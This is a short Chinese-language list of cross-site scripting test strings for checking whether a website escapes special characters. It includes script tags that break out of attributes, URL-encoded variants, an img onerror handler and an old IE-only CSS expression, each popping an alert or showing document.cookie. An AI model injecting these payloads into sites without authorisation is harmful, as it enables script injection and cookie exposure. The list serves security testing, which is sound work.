通常有一些方式可以测试网站是否有正确处理特殊字符:
-
><script>alert(document.cookie)</script> -
='><script>alert(document.cookie)</script> -
"><script>alert(document.cookie)</script> -
<script>alert(document.cookie)</script> -
<script>alert (vulnerable)</script> -
%3Cscript%3Ealert('XSS')%3C/script%3E -
<script>alert('XSS')</script> -
<img src="javascript:alert('XSS')"> -
<img src="http://xxx.com/yyy.png" onerror="alert('XSS')"> -
<div style="height:expression(alert('XSS'),1)"></div>(这个仅于IE7(含)之前有效)










